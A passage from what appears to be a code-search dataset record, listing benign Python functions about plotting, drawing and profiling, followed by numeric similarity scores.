[6, 7]]]))\n\n toolBar = self.plot.getProfileToolbar()\n\n manager = toolBar.getProfileManager()\n roiManager = manager.getRoiManager()\n\n roi = rois.ProfileImageStackHorizontalLineROI()\n roi.setPosition(0.5)\n roi.setProfileType(\"2D\")\n roiManager.addRoi(roi)\n roiManager.setCurrentRoi(roi)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot2D)\n\n roi.setProfileType(\"1D\")\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot1D)", "def getprofile(): # real signature unknown; restored from __doc__\n pass", "def _doProfile(self, save_request=None):\n prof = self._getProfileFromUser()\n # If saveProfile(), process user-modifyable fields\n if save_request:\n for field in ('displayName', 'teeShirtSize'):\n if hasattr(save_request, field):\n val = getattr(save_request, field)\n if val:\n print(val)\n setattr(prof, field, str(val))\n prof.put()\n # Return ProfileForm\n return self._copyProfileToForm(prof)", "def get_profile_data(auth, db):\n\n id_team, user, team, money, color_prim, color_sec = analyze_init(auth, db)\n id_user, seats, fans, ranking, streak = analyze_team_page(auth, db, id_team)\n\n \n v_profile = profile.Profile(\n id_user, user, id_team, team, money, color_prim, \n color_sec, seats, fans, ranking, streak\n )\n\n if (db.profile.find_one({\"id\": int(id_team)}) is not None):\n db.profile.replace_one(\n {\"id\": int(id_team)}, v_profile.to_db_collection())\n else:\n db.profile.insert_one(v_profile.to_db_collection())\n\n print(show(\"profile\") + \" > Perfil actualizado\")\n\n return id_team", "def draw(self, ctx, centerpoint, basepoint=(0, 0),\n angle=0, scale_x=1.0, scale_y=1.0, \n opacity=1,\n axes=True):\n ctx.set_line_width(3)\n ctx.set_line_join(cairo.LINE_JOIN_ROUND)\n \n ctx.translate(centerpoint[0], centerpoint[1])\n ctx.rotate(angle)\n ctx.scale(scale_x, scale_y)\n\n ctx.translate(basepoint[0], basepoint[1])\n\n # sign panels\n ctx.set_source_rgba(*color_hex_unpack(\"#3165A5\", opacity))\n for c, p in zip([(50, 100), (-50, 100), (-50, -100), (50, -100)], xrange(4)):\n ctx.arc(c[0], c[1], 5, math.radians(p * 90), math.radians((p + 1) * 90)) \n ctx.close_path()\n ctx.fill()\n\n ctx.set_source_rgba(*color_hex_unpack(\"#EFEFEF\", opacity))\n for c, p in zip([(35, 30), (-35, 30), (-35, -70), (35, -70)], xrange(4)):\n ctx.arc(c[0], c[1], 10, math.radians(p * 90), math.radians((p + 1) * 90)) \n ctx.close_path()\n ctx.fill()\n \n # text label\n ctx.set_source_rgba(*color_hex_unpack(\"#293531\", opacity))\n ctx.set_font_size(18)\n ctx.move_to(-ctx.text_extents('Такси')[4] / 2, -50)\n ctx.show_text('Такси')\n\n # car shape\n ctx.move_to(0, -40)\n ctx.curve_to(20, -40, 10, -10, 30, -10)\n ctx.curve_to(40, -10, 40, 15, 30, 15)\n\n # wheels\n ctx.curve_to(15, 15, 30, 30, 15, 30)\n ctx.curve_to(0, 30, 15, 15, 0, 15)\n\n ctx.curve_to(-15, 15, 0, 30, -15, 30)\n ctx.curve_to(-30, 30, -15, 15, -30, 15)\n\n ctx.curve_to(-40, 15, -40, -10, -30, -10)\n ctx.curve_to(-10, -10, -20, -40, 0, -40)\n ctx.close_path()\n ctx.fill()\n\n # windscreen\n ctx.set_source_rgba(*color_hex_unpack(\"#EFEFEF\", opacity))\n ctx.move_to(0, -30)\n for point in [(5, -30), (10, -10), (-10, 
-10), (-5, -30), (0, -30)]:\n ctx.line_to(point[0], point[1])\n ctx.close_path()\n ctx.fill()\n\n # lights\n for c in 17, -17:\n ctx.move_to(c, -3)\n for point in [(c + 5, -3), (c + 5, 5), (c - 5, 5), (c - 5, -3)]:\n ctx.line_to(point[0], point[1])\n ctx.close_path()\n ctx.stroke()\n\n ctx.translate(-basepoint[0], -basepoint[1])\n\n ctx.scale(1/scale_x, 1/scale_y)\n ctx.rotate(-angle)\n ctx.translate(-centerpoint[0], -centerpoint[1])", "def update(self, profile: Dict[datetime.time, float]) -> None:\n\n if self._profile is None:\n self._profile = profile\n else:\n self._profile.update(profile)", "def draw(self):\n self.write_image()\n self.update()", "def paint(self, draw, x, y, w, h):\n\t\tpass", "def GenerateMotionProfile(motion_profile_name, file_name, trajectory,\r\n position_units, velocity_units):\r\n # Grab the position, velocity, and duration\r\n path = []\r\n output = open(os.path.join(FILE_OUTPUT_PATH, file_name+\".txt\"), \"w\")\r\n output.write(\"position, velocity, acceration, dt\\n\")\r\n for i in range(len(trajectory)):\r\n path.append([trajectory[i].position * position_units,\r\n trajectory[i].velocity * velocity_units,\r\n 0.0, # No heading is used for single-axis\r\n int(trajectory[i].dt * 1000)])\r\n\r\n output.write(\"%3.4f, %3.4f, %3.4f, %1.3f\\n\" %\r\n (trajectory[i].position, trajectory[i].velocity,\r\n trajectory[i].acceleration, trajectory[i].dt))\r\n\r\n output.close()\r\n\r\n # Dump the path into a pickle file which will be read up later by the RoboRIO robot code\r\n with open(os.path.join(motion_profile_name, file_name+\".pickle\"), \"wb\") as fp:\r\n pickle.dump(path, fp)\r\n\r\n # Plot the data for review\r\n plt.figure()\r\n plt.title(\"Trajectory(Native Units)\")\r\n plt.plot([segment.y * position_units for segment in trajectory],\r\n [segment.x * position_units for segment in trajectory],\r\n marker='.', color='b')\r\n x = list(i * (trajectory[i].dt) for i, _ in enumerate(trajectory))\r\n\r\n # Plot the velocity and acceleration and look for any discontinuities\r\n plt.figure()\r\n plt.subplot(2, 1, 1)\r\n plt.title(\"Velocity\")\r\n plt.plot(x, [segment.velocity for segment in trajectory], marker='.', color='r',\r\n label='velocity')\r\n plt.grid()\r\n plt.subplot(2, 1, 2)\r\n plt.title(\"Acceleration\")\r\n plt.plot(x, [segment.acceleration for segment in trajectory], marker='.', color='b',\r\n label='acceration')\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.show()", "def prof2frame(prof):\n\n import pandas as pd\n\n # create data frame from profile dicts\n frame = pd.DataFrame(prof)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate entity type\n def _entity (row):\n if not row['uid']:\n return 'session'\n if 'unit' in row['uid']:\n return 'unit'\n if 'pilot' in row['uid']:\n return 'pilot'\n return 'session'\n frame['entity'] = frame.apply(lambda row: _entity (row), axis=1)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate if a unit / pilot / ... 
is cloned\n def _cloned (row):\n if not row['uid']:\n return False\n else:\n return 'clone' in row['uid'].lower()\n frame['cloned'] = frame.apply(lambda row: _cloned (row), axis=1)\n\n return frame", "def plot(draw, img, x, y, c, col, steep, dash_interval):\n if steep:\n x, y = y, x\n if x < img.size[0] and y < img.size[1] and x >= 0 and y >= 0:\n c = c * (float(col[3]) / 255.0)\n p = img.getpixel((x, y))\n x = int(x)\n y = int(y)\n if dash_interval:\n d = dash_interval - 1\n if (x / dash_interval) % d == 0 and (y / dash_interval) % d == 0:\n return\n draw.point(\n (x, y),\n fill=(\n int((p[0] * (1 - c)) + col[0] * c),\n int((p[1] * (1 - c)) + col[1] * c),\n int((p[2] * (1 - c)) + col[2] * c),\n 255,\n ),\n )", "def plot_prodata_psf(self,font_size=28,img_name='prodata_psf.pdf',img_id=0):\n rawimage = self.raw_image\n dataimage = self.data\n len_mask = self.lens_mask\n plu_mask_out = self.plu_mask\n\n fig, (ax1, ax2, ax3, ax4,ax5) = plt.subplots(1, 5, figsize=(19, 10))\n ax1.imshow((rawimage), origin='lower', cmap=\"gist_heat\")\n ax1.set_title('Original Image', fontsize=font_size)\n ax1.text(rawimage.shape[0] * 0.55, rawimage.shape[0] * 0.8, 'ID='+repr(img_id), size=12, color='white',\n weight=\"bold\")\n ax1.text(rawimage.shape[0] * 0.2, rawimage.shape[0] * 0.05, 'observation', size=20, color='white', weight=\"bold\")\n ax1.axis('off')\n #\n ax2.imshow((dataimage), origin='lower', cmap=\"gist_heat\")\n ax2.set_title('Image Data', fontsize=font_size)\n ax2.text(dataimage.shape[0] * 0.2, dataimage.shape[0] * 0.05, 'image data', size=20, color='white', weight=\"bold\")\n ax2.axis('off')\n #\n ax3.imshow(len_mask, origin='lower')\n ax3.set_title('Lens light', fontsize=font_size)\n ax3.axis('off')\n #\n ax4.imshow(plu_mask_out, origin='lower')\n ax4.set_title('Mask', fontsize=font_size)\n ax4.axis('off')\n#\n psf=self.psf\n ax5.imshow(np.log10(psf), origin='lower', cmap=\"gist_heat\")\n ax5.set_title('lg(PSF)', fontsize=font_size)\n ax5.axis('off')\n\n plt.show()\n fig.savefig(img_name)\n return 0", "def config_copy(ipydir, profile):\n for fpath in profile_files(profile):\n filename = osp.basename(fpath)\n dest_file = osp.join(ipydir, 'profile_' + profile, 'startup',\n filename)\n shutil.copy(fpath, dest_file)\n logger.info(\"Copy files '%s' for profile '%s'.\",\n osp.basename(filename), profile)", "def draw(self, frame, offset=OFS):\n frame[\n OFS : OFS + self.image.shape[0], OFS : OFS + self.image.shape[1]\n ] = self.image", "def _enable_profiling():\n import cProfile\n import atexit\n global _profiler\n _profiler = cProfile.Profile()\n _profiler.enable()\n atexit.register(_profile_atexit)", "def updateSkin(self, skinColor): \n self.avatarConfiguration[\"skin\"] = str(skinColor)\n self.paintBody()\n self.paintHead()" ]
[ "0.56249416", "0.49046072", "0.4773243", "0.4728293", "0.47255272", "0.46967715", "0.460233", "0.45648476", "0.45566934", "0.45022318", "0.44824857", "0.44786713", "0.44598132", "0.4454975", "0.44341892", "0.4383001", "0.43778774", "0.43481213", "0.43244997", "0.43213403", "0.43109924", "0.43092555", "0.42924997", "0.4275022", "0.42717794", "0.42637676", "0.42579624", "0.42568153", "0.4250528", "0.42297515", "0.41791132", "0.4170161", "0.41592014", "0.4157594", "0.41359648", "0.41130975", "0.4102554", "0.40866253", "0.4082219", "0.40677637", "0.40663192", "0.4063469", "0.40632465", "0.4059623", "0.40590644", "0.40563622", "0.40516633", "0.40486848", "0.40455806", "0.4039972", "0.40398645", "0.40291777", "0.40265444", "0.40202293", "0.40138686", "0.4009288", "0.4009029", "0.40066674", "0.3991365", "0.39895004", "0.39849782", "0.39818567", "0.39781985", "0.39752984", "0.39703432", "0.397009", "0.39693472", "0.39684036", "0.39649633", "0.39577505", "0.39542562", "0.39541918", "0.39525884", "0.395199", "0.39510167", "0.39492747", "0.3941734", "0.39341393", "0.3933188", "0.39314187", "0.39237225", "0.39225984", "0.39131108", "0.38957238", "0.38899803", "0.3889964", "0.388914", "0.38859197", "0.38843143", "0.38829914", "0.38805312", "0.3875732", "0.3873306", "0.38712472", "0.3870599", "0.3869456", "0.3866824", "0.3865415", "0.38601515", "0.38588455" ]
0.70576626
0
Take a draft_dict that was already validated by draft_dict_validator, then further sanitize, validate, and transform it. Ultimately return this "further validated" draft dict. It will have a slightly different set of keys, the values of which can be used to directly create a Draft object.
def further_validated_draft_dict(
    draft_dict: Dict[str, Any], user_profile: UserProfile
) -> Dict[str, Any]:
    content = normalize_body(draft_dict["content"])

    timestamp = draft_dict.get("timestamp", time.time())
    timestamp = round(timestamp, 6)
    if timestamp < 0:
        # While it's not exactly an invalid timestamp, it's not something
        # we want to allow either.
        raise JsonableError(_("Timestamp must not be negative."))
    last_edit_time = timestamp_to_datetime(timestamp)

    topic = ""
    recipient_id = None
    to = draft_dict["to"]
    if draft_dict["type"] == "stream":
        topic = truncate_topic(draft_dict["topic"])
        if "\0" in topic:
            raise JsonableError(_("Topic must not contain null bytes"))
        if len(to) != 1:
            raise JsonableError(_("Must specify exactly 1 stream ID for stream messages"))
        stream, sub = access_stream_by_id(user_profile, to[0])
        recipient_id = stream.recipient_id
    elif draft_dict["type"] == "private" and len(to) != 0:
        to_users = get_user_profiles_by_ids(set(to), user_profile.realm)
        try:
            recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id
        except ValidationError as e:  # nocoverage
            raise JsonableError(e.messages[0])

    return {
        "recipient_id": recipient_id,
        "topic": topic,
        "content": content,
        "last_edit_time": last_edit_time,
    }
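To make the row's document concrete, here is a minimal usage sketch of how the "further validated" dict feeds Draft creation, modeled on the do_create_drafts negative below. It assumes the Zulip models and helpers referenced in the document (Draft, UserProfile, further_validated_draft_dict) are importable; the wrapper name create_single_draft is hypothetical and not part of the dataset row:

    from typing import Any, Dict

    # Hypothetical convenience wrapper (an assumption, not the library's API):
    # run the transform above, then persist the result as a single Draft row.
    def create_single_draft(draft_dict: Dict[str, Any], user_profile: UserProfile) -> Draft:
        valid = further_validated_draft_dict(draft_dict, user_profile)
        return Draft.objects.create(
            user_profile=user_profile,
            recipient_id=valid["recipient_id"],      # resolved stream/user recipient (may be None)
            topic=valid["topic"],                    # "" for private-message drafts
            content=valid["content"],                # normalized message body
            last_edit_time=valid["last_edit_time"],  # datetime derived from the timestamp
        )

Note how the returned keys (recipient_id, topic, content, last_edit_time) map one-to-one onto Draft model fields, which is exactly the "slightly different set of keys" the query describes.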
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _draft_from_response(data):\n return Draft(\n uuid=UUID(data['uuid']),\n bundle_uuid=UUID(data['bundle_uuid']),\n name=data['name'],\n updated_at=dateutil.parser.parse(data['staged_draft']['updated_at']),\n files={\n path: DraftFile(path=path, **file)\n for path, file in data['staged_draft']['files'].items()\n },\n links={\n name: DraftLinkDetails(\n name=name,\n direct=LinkReference(**link[\"direct\"]),\n indirect=[LinkReference(**ind) for ind in link[\"indirect\"]],\n modified=link[\"modified\"],\n )\n for name, link in data['staged_draft']['links'].items()\n }\n )", "def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_object.content = valid_draft_dict[\"content\"]\n draft_object.topic = valid_draft_dict[\"topic\"]\n draft_object.recipient_id = valid_draft_dict[\"recipient_id\"]\n draft_object.last_edit_time = valid_draft_dict[\"last_edit_time\"]\n draft_object.save()\n\n event = {\"type\": \"drafts\", \"op\": \"update\", \"draft\": draft_object.to_dict()}\n send_event(user_profile.realm, event, [user_profile.id])", "def create_draft(self):\n return Draft(self)", "def _convert_states_v28_dict_to_v29_dict(cls, draft_change_list):\n return draft_change_list", "def clean_dict(d):\n if not isinstance(d, dict):\n return d\n return dict((clean_dict(k), v) for k, v in d.items() if k is not 'dates')", "def validate_input(self, deposition, draft_id=None):\n v = APIValidator()\n draft_id = draft_id or deposition.get_default_draft_id()\n metadata_schema = deposition.type.api_metadata_schema(draft_id)\n\n if metadata_schema:\n schema = self.input_schema.copy()\n schema['metadata'] = metadata_schema\n else:\n schema = self.input_schema\n\n # Either conform to dictionary schema or dictionary is empty\n if not v.validate(request.json, schema) and \\\n request.json:\n abort(\n 400,\n message=\"Bad request\",\n status=400,\n errors=filter_validation_errors(v.errors),\n )", "def _get_draft(self):\n review_request = self.create_review_request(publish=True)\n return ReviewRequestDraft.create(review_request)", "def _convert_states_v27_dict_to_v28_dict(cls, draft_change_list):\n for i, change in enumerate(draft_change_list):\n if (change.cmd == exp_domain.CMD_EDIT_STATE_PROPERTY and\n change.property_name ==\n exp_domain.STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED): # pylint: disable=line-too-long\n draft_change_list[i] = exp_domain.ExplorationChange({\n 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,\n 'property_name': (\n exp_domain.STATE_PROPERTY_RECORDED_VOICEOVERS),\n 'state_name': change.state_name,\n 'new_value': {\n 'voiceovers_mapping': change.new_value\n }\n })\n\n return draft_change_list", "def create_dict_deep_distortion_old(defect_dict: dict, \r\n fancy_defects: dict,\r\n ):\r\n dict_deep_distortion = {}\r\n defect_dict_copy = defect_dict.copy()\r\n for defect_type in fancy_defects.keys(): # for each defect type (vac, as , int)\r\n \r\n dict_deep_distortion[defect_type] = import_deep_distortion_by_type(defect_dict_copy[defect_type],\r\n fancy_defects[defect_type]) #defects for which we'll try the deep distortion found for one of the charge states \r\n return dict_deep_distortion", "def _convert_states_v29_dict_to_v30_dict(cls, draft_change_list):\n for i, change in 
enumerate(draft_change_list):\n if (change.cmd == exp_domain.CMD_EDIT_STATE_PROPERTY and\n change.property_name ==\n exp_domain.STATE_PROPERTY_INTERACTION_ANSWER_GROUPS):\n draft_change_list[i] = exp_domain.ExplorationChange({\n 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,\n 'property_name': (\n exp_domain.STATE_PROPERTY_INTERACTION_ANSWER_GROUPS),\n 'state_name': change.state_name,\n 'new_value': {\n 'rule_specs': change.new_value['rule_specs'],\n 'outcome': change.new_value['outcome'],\n 'training_data': change.new_value['training_data'],\n 'tagged_skill_misconception_id': None\n }\n })\n return draft_change_list", "def get(self, oauth, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n return d.type.marshal_draft(d.get_draft(draft_id))", "def do_create_drafts(draft_dicts: List[Dict[str, Any]], user_profile: UserProfile) -> List[Draft]:\n draft_objects = []\n for draft_dict in draft_dicts:\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_objects.append(\n Draft(\n user_profile=user_profile,\n recipient_id=valid_draft_dict[\"recipient_id\"],\n topic=valid_draft_dict[\"topic\"],\n content=valid_draft_dict[\"content\"],\n last_edit_time=valid_draft_dict[\"last_edit_time\"],\n )\n )\n\n created_draft_objects = Draft.objects.bulk_create(draft_objects)\n\n event = {\n \"type\": \"drafts\",\n \"op\": \"add\",\n \"drafts\": [draft.to_dict() for draft in created_draft_objects],\n }\n send_event(user_profile.realm, event, [user_profile.id])\n\n return created_draft_objects", "def clean_form_dict(self, dict_):\n clean_dict = {}\n first_pdb_type, first_pdb_id, first_pdb_file = '', '', ''\n second_pdb_type, second_pdb_id, second_pdb_file = '', '', ''\n x1, y1, z1, x2, y2, z2 = '0', '0', '0', '0', '0', '0'\n degXY_1, degYZ_1, degXY_2, degYZ_2 = '0', '0', '0', '0'\n\n num_of_proteins = dict_.get('num_of_proteins')\n user_rand = dict_.get('user_rand')\n first_pdb_type = dict_.get('first_pdb_type')\n if first_pdb_type == 'by_id':\n first_pdb_id = dict_.get('first_pdb_id')\n first_pdb_file = ''\n elif first_pdb_type == 'by_file':\n first_pdb_id = ''\n first_pdb_file = dict_.get('first_pdb_file')\n\n if num_of_proteins == '2':\n second_pdb_type = dict_.get('second_pdb_type')\n if second_pdb_type == 'by_id':\n second_pdb_id = dict_.get('second_pdb_id')\n second_pdb_file = ''\n elif first_pdb_type == 'by_file':\n second_pdb_id = ''\n second_pdb_file = dict_.get('second_pdb_file')\n x2, y2, z2 = dict_.get('x2', 0), dict_.get('y2', 0), dict_.get('z2', 0)\n degXY_2, degYZ_2 = dict_.get('degXY_2', 0), dict_.get('degYZ_2', 0)\n\n x1, y1, z1 = dict_.get('x1', 0), dict_.get('y1', 0), dict_.get('z1', 0)\n degXY_1, degYZ_1 = dict_.get('degXY_1', 0), dict_.get('degYZ_1', 0)\n\n temperature_scale = dict_.get('temperature_scale', '')\n temperature = dict_.get('temperature', '')\n time_step_number = dict_.get('time_step_number', '')\n\n clean_dict['user_rand'] = user_rand\n clean_dict['num_of_proteins'] = num_of_proteins\n clean_dict['first_pdb_type'] = first_pdb_type\n clean_dict['first_pdb_id'] = first_pdb_id\n clean_dict['first_pdb_file'] = first_pdb_file\n clean_dict['second_pdb_type'] = second_pdb_type\n clean_dict['second_pdb_id'] = second_pdb_id\n clean_dict['second_pdb_file'] = second_pdb_file\n clean_dict['x1'] = x1\n clean_dict['y1'] = y1\n clean_dict['z1'] = z1\n clean_dict['x2'] = x2\n clean_dict['y2'] = y2\n clean_dict['z2'] = z2\n clean_dict['degXY_1'] = degXY_1\n clean_dict['degYZ_1'] = degYZ_1\n clean_dict['degXY_2'] = degXY_2\n 
clean_dict['degYZ_2'] = degYZ_2\n clean_dict['temperature_scale'] = temperature_scale\n clean_dict['temperature'] = temperature\n clean_dict['time_step_number'] = time_step_number\n\n return clean_dict", "def translate_dict(entity_dict, config):\n\n dump_accepted_entity_dict = OrderedDict()\n\n for key in entity_dict:\n if key in config[\"ent_keys_dump\"]:\n dump_accepted_entity_dict[config[\n \"ent_keys_dump\"][key]] = entity_dict[key]\n\n else:\n dump_accepted_entity_dict[key] = entity_dict[key]\n\n return dump_accepted_entity_dict", "def convert_to_draft(self, source_location):\r\n if source_location.category in DIRECT_ONLY_CATEGORIES:\r\n raise InvalidVersionError(source_location)\r\n original = self.collection.find_one({'_id': source_location.to_deprecated_son()})\r\n if not original:\r\n raise ItemNotFoundError(source_location)\r\n draft_location = as_draft(source_location)\r\n original['_id'] = draft_location.to_deprecated_son()\r\n try:\r\n self.collection.insert(original)\r\n except pymongo.errors.DuplicateKeyError:\r\n raise DuplicateItemError(original['_id'])\r\n\r\n self.refresh_cached_metadata_inheritance_tree(draft_location.course_key)\r\n\r\n return wrap_draft(self._load_items(source_location.course_key, [original])[0])", "def dict_normalization(dict_, nested=False):\n dict_norm = dict()\n if not nested:\n if dict_.values():\n d_max = max(dict_.values())\n d_min = min(dict_.values())\n if d_max - d_min == 0:\n dict_norm = {key: 1 for key in dict_}\n else:\n dict_norm = {key: (dict_[key] - d_min) / (d_max - d_min) for key in dict_}\n else:\n for key_1 in dict_:\n if dict_[key_1]:\n dict_norm[key_1] = dict()\n else: continue\n d_max = max(dict_[key_1].values())\n d_min = min(dict_[key_1].values())\n for key_2 in dict_[key_1]:\n if d_max - d_min == 0:\n dict_norm[key_1][key_2] = 1 / len(dict_[key_1])\n else:\n dict_norm[key_1][key_2] = (dict_[key_1][key_2] - d_min) / (d_max - d_min)\n return dict_norm", "def validate_to_python(self, value):\n super(DictField, self).validate(value)\n if value == None:\n return {}\n if not isinstance(value, dict):\n raise ValidationError('Must be a dict, got {0}'.format(type(value).__name__))\n form = self.Form(value)\n if form.is_valid():\n return form.cleaned_data\n else:\n errors = form.errors.as_text()\n raise ValidationError(errors)", "def _from_dict_transform(cls: Type[TVerifiedElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n data = super()._from_dict_transform(data)\n\n if 'verified' in data:\n data['is_verified'] = data.pop('verified')\n\n if 'verification_code' in data:\n del data['verification_code']\n\n return data", "def _normalize(self, dictionnary):\r\n copy_dict = OrderedDict()\r\n for k,v in dictionnary.items():\r\n if isinstance(v, OrderedDict):\r\n copy_dict[k.replace('#','').replace('@','')] = self._normalize(v)\r\n else:\r\n copy_dict[k.replace('#','').replace('@','')] = v\r\n return copy_dict", "def _mask_dict(self, value):\n\n return MaskedDict(value)", "def validate_update(cls, document: dict) -> dict:\n if document is None:\n return {\"\": [\"No data provided.\"]}\n\n if not isinstance(document, dict):\n return {\"\": [\"Must be a dictionary.\"]}\n\n new_document = copy.deepcopy(document)\n\n errors = {}\n\n updated_field_names = [\n field.name for field in cls.__fields__ if field.name in new_document\n ]\n unknown_fields = [\n field_name\n for field_name in new_document\n if field_name not in updated_field_names\n ]\n for unknown_field in unknown_fields:\n known_field, field_value = cls._to_known_field(\n 
unknown_field, new_document[unknown_field]\n )\n if known_field:\n new_document.setdefault(known_field.name, {}).update(field_value)\n elif not cls._skip_unknown_fields:\n errors.update({unknown_field: [\"Unknown field\"]})\n\n # Also ensure that primary keys will contain a valid value\n updated_fields = [\n field\n for field in cls.__fields__\n if field.name in new_document or field.is_primary_key\n ]\n for field in updated_fields:\n errors.update(field.validate_update(new_document))\n\n return errors", "def process_dict(self, dictionary):\n return self._flatten(dictionary)", "def get_draft(draft_uuid):\n assert isinstance(draft_uuid, UUID)\n try:\n data = api_request('get', api_url('drafts', str(draft_uuid)))\n except NotFound:\n raise DraftNotFound(f\"Draft does not exist: {draft_uuid}\") # lint-amnesty, pylint: disable=raise-missing-from\n return _draft_from_response(data)", "def validate(self, parameters_dict):\n return DiffParameters.schema(parameters_dict)", "def validate_insert(cls, document: dict) -> dict:\n if document is None:\n return {\"\": [\"No data provided.\"]}\n\n if not isinstance(document, dict):\n return {\"\": [\"Must be a dictionary.\"]}\n\n new_document = copy.deepcopy(document)\n\n errors = {}\n\n field_names = [field.name for field in cls.__fields__]\n unknown_fields = [\n field_name for field_name in new_document if field_name not in field_names\n ]\n for unknown_field in unknown_fields:\n known_field, field_value = cls._to_known_field(\n unknown_field, new_document[unknown_field]\n )\n if known_field:\n new_document.setdefault(known_field.name, {}).update(field_value)\n elif not cls._skip_unknown_fields:\n errors.update({unknown_field: [\"Unknown field\"]})\n\n for field in cls.__fields__:\n errors.update(field.validate_insert(new_document))\n\n return errors", "def load_transform_state_dict(self, state_dict):\n assert isinstance(self.transform_keys, list)\n assert isinstance(self.rename_transform_keys, dict)\n\n remaining = { utils.key_to_value(self.rename_transform_keys, k, False):v for k,v in state_dict.items() if k.split('.')[0] \\\n in self.transform_keys or k in self.transform_keys }\n self.load_state_dict(remaining, strict=False)\n\n return self", "def _from_dict_transform(cls: Type[TElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n if 'application' in data:\n data['created_by'] = data.pop('application')\n\n if 'added_timestamp' in data:\n data['created_ts'] = data.pop('added_timestamp')\n\n if 'created_ts' not in data:\n # some really old nin entries in the database have neither created_ts nor modified_ts\n data['_no_created_ts_in_db'] = True\n data['created_ts'] = datetime.fromisoformat('1900-01-01')\n\n if 'modified_ts' not in data:\n data['_no_modified_ts_in_db'] = True\n # Use created_ts as modified_ts if no explicit modified_ts was found\n data['modified_ts'] = data['created_ts']\n\n return data", "def clean_dict(d):\n\n if not isinstance(d, (dict, list)):\n return d\n if isinstance(d, list):\n return [v for v in (clean_dict(v) for v in d) if v]\n return OrderedDict([(k, v) for k, v in ((k, clean_dict(v)) for k, v in list(d.items())) if v])", "def _sanitize(data_dict):\n return data_dict", "def _from_dict_transform(cls: Type[TPrimaryElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n data = super()._from_dict_transform(data)\n\n if 'primary' in data:\n data['is_primary'] = data.pop('primary')\n\n return data", "def update_draft(self, kav_id, html):\n kav_api = getattr(self.api, settings.SALESFORCE_ARTICLE_TYPE)\n data = 
html.create_article_data()\n result = kav_api.update(kav_id, data)\n if result != HTTPStatus.NO_CONTENT:\n raise SalesforceError((\n 'Error updating draft KnowledgeArticleVersion (ID={})'\n ).format(kav_id))\n return result", "def transform_dict(dc: dict):\n tmp_dict = dict()\n for k, v in dc.items():\n k1, k2 = k.split(\"|\")\n v1 = {'e': v, 'c': k2}\n v2 = {'e': v, 'c': k1}\n insert_to_dict(tmp_dict, k1, v1)\n insert_to_dict(tmp_dict, k2, v2)\n return tmp_dict", "def _cleanse_dict(original):\n return dict((k, v) for k, v in original.items() if \"_pass\" not in k)", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def normalize_entity(in_dict):\n out_dict = in_dict.copy()\n if 'pk' in list(in_dict):\n out_dict['id'] = in_dict['pk']\n del out_dict['pk']\n if 'start_time' in list(in_dict):\n out_dict['start_time'] = \\\n datetime.strptime(in_dict['start_time'], '%Y-%m-%dT%H:%M:%S.%fZ') \\\n if out_dict['start_time'] else None\n if 'end_time' in list(in_dict):\n out_dict['end_time'] = \\\n datetime.strptime(in_dict['end_time'], '%Y-%m-%dT%H:%M:%S.%fZ') \\\n if out_dict['end_time'] else None\n if 'created_at' in list(in_dict):\n out_dict['created_at'] = datetime.strptime(in_dict['created_at'],\n '%Y-%m-%dT%H:%M:%S.%fZ')\n if 'updated_at' in list(in_dict):\n out_dict['updated_at'] = datetime.strptime(in_dict['updated_at'],\n '%Y-%m-%dT%H:%M:%S.%fZ')\n return out_dict", "def CleanUpDict(dct):\n SanityCheck.ValidateTypes(((dct, dict),))\n\n new_dct = {}\n for key in dct:\n if dct[key]:\n new_dct[key] = dct[key]\n\n return new_dct", "def edit_draft(self, message_id):\n return Draft(self, message_id).fetch()", "def from_dict(cls, word_dict):\n\n return super().from_dict(word_dict)", "def make_from_clean_dict(dict):\n household = Household()\n for k, v in dict.items():\n if k == \"head\":\n household.__setattr__(k, Member.make_from_clean_dict(v))\n elif k == \"spouse\":\n household.__setattr__(k, Member.make_from_clean_dict(v))\n elif k == \"others\":\n newvals = [Member.make_from_clean_dict(d) for d in v]\n household.__setattr__(k, newvals)\n elif k == \"address\":\n household.__setattr__(k, Address.make_from_clean_dict(v))\n elif k == \"clean_json_string\":\n pass\n else:\n household.__setattr__(k, v)\n return household", "def from_dict(cls, dikt) -> 'ComAdobeGraniteMaintenanceCrxImplRevisionCleanupTaskProperties':\n return util.deserialize_model(dikt, cls)", "def sanitize(object: dict, regex: re.Pattern = (\n re.compile(r\"(?<!(?P<bound><)\\W)\\b(?P<word>\\w+)\\b(?(bound)(?!>)|)\")\n), placeholder: str = \"<obscured>\") -> dict:\n\n result = dict()\n\n # import json; print(json.dumps(object, indent=4))\n\n for key, value in object.items():\n\n if isinstance(value, dict):\n value = sanitize(value)\n\n if key in (\n \"enterprise_name\", \"email\", \"name\", \"name_normalized\",\n \"real_name\", \"real_name_normalized\", \"display_name\",\n \"display_name_normalized\", \"title\", \"phone\", \"skype\",\n \"first_name\", \"last_name\"\n ):\n value = placeholder if value else None\n\n if key.startswith((\"image\", 